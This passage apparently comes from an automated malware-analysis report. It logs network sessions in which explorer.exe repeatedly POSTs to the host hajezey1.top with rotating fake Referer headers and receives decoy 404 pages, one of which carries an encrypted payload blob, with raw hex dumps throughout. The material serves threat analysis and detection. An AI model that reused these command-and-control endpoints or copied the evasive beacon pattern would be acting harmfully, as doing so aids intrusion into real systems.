b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 23 36 55 96 da 19 d1 3a 2d b2 4e 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 71 87 4a 04 38 6d 72 14 2c d0 e8 b1 14 65 7c 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 a2 4c 64 cd 25 5c 8d b7 bf 2e 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 c5 d0 b8 be 34 56 9b 46 76 99 86 11 00 83 32 42 52 f7 c2 ae 64 0f 95 36 e1 48 52 67 25 50 b8 81 f6 bc 81 de bb 6e 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 bc a6 62 4a 08 5d f6 b3 06 2d 1a c0 5e f3 7c bb a7 fd d4 98 21 17 da 9a 2d 35 23 7d f5 b2 68 60 b8 10 31 fa ed ad 67 e1 e1 bd 84 f3 8c 40 b6 f0 90 4f a1 21 71 ae 61 2e 7a b1 76 af ce c6 83 41 66 30 ae a9 c8 d0 7e 33 3a 64 67 0b bf 77 6a 66 21 0e 8a ef 28 1d 41 81 d4 b6 78 8e 18 d3 e4 9e 0c 7b d6 6c 02 2f 27 76 d7 9b 4e 20 ba f5 be 08 85 fd 89 aa 41 b7 28 8f f4 d5 06 78 5c 9b b8 08 c0 e5 5c c5 17 00 f3 b8 d0 a3 39 a9 b2 13 20 1d 06 1a 1b e1 ea f0 6c 8d e9 c7 d2 83 6f d5 c5 3b ec cf 8b 40 75 02 99 e0 03 f4 c3 05 cb 99 d3 23 2a 71 c7 a5 d9 62 77 ca 08 8f bd c8 11 61 a1 99 9e 5f e3 0f 4e 8a d0 23 9d 43 8e 7e 14 0e b9 2c 58 99 f7 6d 08 d8 fd f7 cb ab 42 66 fb 05 6d 77 5e 8e b7 4a 84 99 fb 42 17 7d bd 91 94 13 85 f3 bd b3 3b 1c 67 c7 22 e7 19 8e 53 c0 b2 21 ab 63 95 22 89 ac 1f 13 34 5e 12 59 b3 52 34 eb e0 0f 25 b8 a3 c1 1d d7 cb ab 14 62 f3 3b 1f 70 da be 91 b3 bf de 2c eb 57 66 80 fe 9d 11 b0 5e fe 14 f9 20 e4 89 93 64 4b 70 94 ea 13 6b e6 e8 80 0b 3d f2 9d 65 09 de fb 18 e1 98 ea 30 e3 dc dd 6a db 82 96 dd 07 22 b9 ed 8c 54 a5 f1 36 81 ac cc b4 29 c7 79 f5 66 38 18 f8 e0 c0 24 b2 f0 9c 24 c8 92 7c f9 d4 e8 53 08 86 52 e4 3f a4 53 65 ad 06 70 00 16 b7 36 df 44 f1 22 74 2c e7 36 c5 da ac da 5f 81 50 ec 3e b9 72 39 0e ac 27 36 82 af 97 28 e0 f6 be e6 a7 e2 84 af 3a ce 39 e8 4e 95 91 3a 90 ff 53 64 22 62 a2 26 0c 11 bf 2a 5c a7 ef c6 a1 00 ae 8b 91 17 5d 35 bd ac c0 59 9d 9b f2 e5 fe de 54 1e 98 92 fb b2 6a 14 9d 84 32 c7 37 6f 03 70 51 8d c8 81 99 8b fa 81 7f 1d bc 6c c2 ca a5 a4 d0 9b 38 ea 81 2f 07 5b 6c 7e 96 23 97 84 79 ea 9a 4a 1d 68 8c 50 16 11 28 a0 81 bc 73 9d 7d bb fa c8 16 31 e5 a8 6f 20 c9 09 e4 ce cd 6b 90 46 97 fe da 39 9d f6 c1 6d 06 42 7b fb fa f3 a5 9a 46 e4
                                                  Data Ascii: 1f66S(SW\/iP"&&grq|6?eIJ5~/ar"`g1Q5ih.Kw:i/+".]pW!RY8|F+%gt+xQ,2P0YObyT=a'4A YU\|;fIXKg[Ge92)g z6(DE}oWpJk"HRI?o|6NI[LeU[0z;+W~5=PVpGZlqV@q!Uvy#6U:-N%GkKm@NQ>[qJ8mr,e|"JG0Z"?kQTJMQLd%\.&Q#F<pvA>C/CbGB4VFv2BRd6HRg%Pnj6'NGc_,/DO9W%bJ]-^|!-5#}h`1g@O!qa.zvAf0~3:dgwjf!(Ax{l/'vN A(x\\9 lo;@u#*qbwa_N#C~,XmBfmw^JB};g"S!c"4^YR4%b;p,Wf^ dKpk=e0j"T6)yf8$$|SR?Sep6D"t,6_P>r9'6(:9N:Sd"b&*\]5YTj27opQl8/[l~#yJhP(s}1o kF9mB{F


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  24192.168.2.749779185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:54.088094950 CEST5518OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://naytoe.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 204
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:54.166321993 CEST5519INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:54 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  25192.168.2.749780185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:54.255789995 CEST5520OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://bggaruuq.net/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 246
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:54.335072041 CEST5521INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:54 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  26192.168.2.749781185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:54.428915977 CEST5521OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://bcaielan.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 163
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:54.509980917 CEST5522INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:54 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  27192.168.2.749782185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:54.601206064 CEST5523OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://sangssr.org/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 260
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:54.682990074 CEST5524INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:54 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  28192.168.2.749783185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:54.777343035 CEST5525OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://eyepud.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 154
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:54.858685970 CEST5526INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:54 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 1d 16 4d aa 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 07 74 d2 87 9a 87 cd 2b 80 78 51 a1 a2 8f 3c 65 dd 1c e0 32 02 50 08 a8 da e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 21 80 20 59 55 11 5c 92 86 64 ab 49 11 80 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 85 92 c9 8a 5c d8 06 0e 45 27 11 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 9c 48 6b 0e e1 a2 22 48 f2 d0 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 4f 5a 96 da 19 d1 3a 2d ca 41 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 8d 7d 14 2c d0 e8 b1 14 1d 73 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 02 43 64 cd 25 5c 8d b7 d7 21 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 6a b7 be 34 56 9b 46 76 99 86 11 00 83 32 42 ea 6f cf ae 04 5d 94 36 e1 48 50 67 35 50 b8 81 be f0 80 de 5b 46 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 85 62 4a 52 7d 54 7a 08 6c 39 c0 5e f3 5c 19 6d 63 95 be 07 3d da 9a 3e 05 22 7d e6 b2 68 60 bd 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 47 4e a1 21 84 88 4b 2e 69 81 77 af dd c6 83 41 df 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 4e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 3d 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 9b 09 09 a8 00 13 30 7b 88 cc c9 e1 a3 c3 e5 0f 25 93 23 c4 a9 d7 cf 8e 3d 39 dc 46 ba 58 dc be b0 98 3f d8 94 eb 53 43 a1 0c 97 e4 6e 76 f9 14 34 0b 64 82 b2 64 4f 55 e0 ca 5e c3 bd c0 88 0b 54 d9 1d 69 7a de ff 3d e1 03 70 2e 1f f4 d4 6a a9 a9 16 da 68 22 bd c8 cb cf 3f ef c8 a9 a6 cc d5 02 47 71 98 66 3c 3d f8 bf cb 67 3f d8 97 24 a9 b9 fc f0 ba e8 57 2d c8 a1 11 19 af 7b 69 ad 72 5b 80 1c 97 36 db 64 11 82 f5 51 aa 3b c5 da a7 f1 7d 87 02 f3 35 43 25 11 00 ac 49 1d 02 a1 b7 28 e4 f0 f7 11 41 a6 a4 87 35 ce 19 c3 ce 85 d5 3a 94 d4 1b e4 2f 62 f1 22 27 c6 99 0a d7 d9 76 c5 89 10 c1 8b ba 97 28 35 bd a8 8f 59 9d 9b cf d5 f5 de 35 1f 98 92 f2 b2 6a 05 85 85 0a 9f 12 6f 03 62 53 b5 f8 80 99 8b 84 80 7f 1d b8 78 c0 b4 a7 a4 d0 91 46 e8 81 2f 0d 4d 76 00 94 23 c7 8e 07 e8 df 4a 17 7a 8d 42 14 7e 26 a0 81 ba 07 47 7d bb fb ce 3b 33 f0 82 6c 27 b4 e3 e4 ce 70 68 98 3b 6a fe da 3d b3 f5 3f 78 81 42 7b f9 e8 f0 85 a5 46 e5
                                                  Data Ascii: 1f66S(SW\/iP"&&grq|6?eIJ5~/ar"`g1Q5ih.Kw:i/+".]pW!RY8|M+%t+xQ<e2P0YObyT=a'4! YU\dIXKg[Ge92)g z6\E'}WpHk"HI?o|6NI[LeU[0z;+W~5=PVpGZlqV@q!UvyOZ:-A%GkKm@NQ>[J8},s"JG0Z"?kQTJMQCd%\!&Q#F<pvA>C/CbGBj4VFv2Bo]6HPg5P[Fj6'NGc_,/DO9W%bJR}Tzl9^\mc=>"}h`1%@GN!K.iwA0!Wnawjg";kzRN{},zHB(yw+;5lo?hs#9Acw9kwN7&,XwlH%f4-ow^7Hg7;=g&9c0{%#=9FX?SCnv4ddOU^Tiz=p.jh"?Gqf<=g?$W-{ir[6dQ;}5C%I(A5:/b"'v(5Y5jobSxF/Mv#JzB~&G};3l'ph;j=?xB{F


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  29192.168.2.749786185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:56.596683025 CEST5739OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://dkvmgnfi.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 147
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:56.670701981 CEST5740INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:56 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  3192.168.2.749794162.159.135.233443C:\Users\user\AppData\Local\Temp\B82B.exe
                                                  TimestampkBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  30192.168.2.749787185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:56.768024921 CEST5740OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://wbdqtrry.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 115
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:56.846256018 CEST5741INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:56 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
